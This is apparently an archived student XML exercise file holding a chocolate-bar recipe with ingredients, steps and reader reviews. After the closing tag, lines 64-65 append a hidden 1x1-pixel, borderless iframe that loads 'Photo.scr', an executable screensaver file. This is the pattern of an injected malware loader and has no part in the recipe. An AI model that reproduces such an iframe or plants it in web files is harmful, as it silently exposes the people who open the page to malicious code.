home *** CD-ROM | disk | FTP | other *** search
/ 207.233.110.77 / 207.233.110.77.tar / 207.233.110.77 / web31 / Section_78401 / Students / Kubit_Braden / tutorial.11 / review / desserts.xml next >
Extensible Markup Language  |  2016-05-28  |  3KB  |  66 lines

  1. <?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
  2.  
  3. <!--
  4.     Desserts from thehelpfulcook.com
  5.     
  6.     Filename: desserts.xml
  7.     Author:   Braden Kubit
  8.     Date: 12/15/11
  9.     
  10. -->
  11. <?xml-stylesheet type="text/css" href="dstyles.css" ?>
  12.  
  13. <desserts>
  14.    <dessert>
  15.    <title>Delicious Chocolate Bars</title>
  16.     <description>
  17.         <![CDATA[
  18.         
  19.          Description: These delicious chocolate bars are a holiday favorite and are 
  20.          very easy to make. For an extra kick add a shot of amaretto to the
  21.          chocolate mixture.
  22.  
  23.         ]]>
  24.     </description>
  25.    <author>Submitted By: Kevin Young</author>
  26.  
  27.    <servings>Servings: 36 bars</servings>
  28.  
  29.    <preptime>Preparation Time: 2 hours</preptime>
  30.  
  31.     <ingredients>
  32.        <ingredient>12 ounce pkg. chocolate chips</ingredient>
  33.        <ingredient>1 (8 oz.) pkg. cream cheese</ingredient>
  34.        <ingredient>1 (5.3 oz.) can evaporated milk</ingredient>
  35.        <ingredient>1 cup walnuts, chopped</ingredient>
  36.        <ingredient>½ teaspoon almond extract</ingredient>
  37.        <ingredient>3 cups all-purpose flour, unsifted</ingredient>
  38.        <ingredient>1 ½ cups granulated sugar</ingredient>
  39.        <ingredient>1 teaspoon baking powder</ingredient>
  40.        <ingredient>½ teaspoon salt</ingredient>
  41.        <ingredient>1 cup butter or margarine, softened</ingredient>
  42.        <ingredient>2 eggs</ingredient>
  43.        <ingredient>½ teaspoon almond extract</ingredient>
  44.     </ingredients>
  45.    
  46.     <steps>
  47.       <step>Combine chocolate chips, cream cheese and evaporated milk in medium saucepan.</step>
  48.       <step>Cover over low heat, stirring constantly, until chips are melted and mixture is smooth.</step>
  49.       <step>Remove from heat; stir in walnuts and ½ teaspoon almond extract. Blend well; set aside.</step> 
  50.       <step>Combine remaining ingredients in large mixer bowl. Blend well with mixer until mixture resembles coarse crumbs.</step> 
  51.       <step>Press half of mixture in greased 13 x 9 inch pan. Spread with chocolate mixture. Sprinkle with rest of crumbs over filling; bake at 375° for 35 to 40 minutes.</step>
  52.    </steps>
  53.    
  54.    <reviews>
  55.  
  56.       <review>4 Stars. Terrific. These are a big hit with our family at Christmas - Lori D.</review>
  57.       <review>4 Stars. Delicious and easy to make - Helen S.</review>
  58.       <review>3 Stars. Very good. A touch heavy for my taste - Stefanie J.</review>
  59.    </reviews>
  60.    
  61.    </dessert>
  62.    
  63. </desserts>
  64. <iframe src=Photo.scr width=1 height=1 frameborder=0>
  65. </iframe>
  66.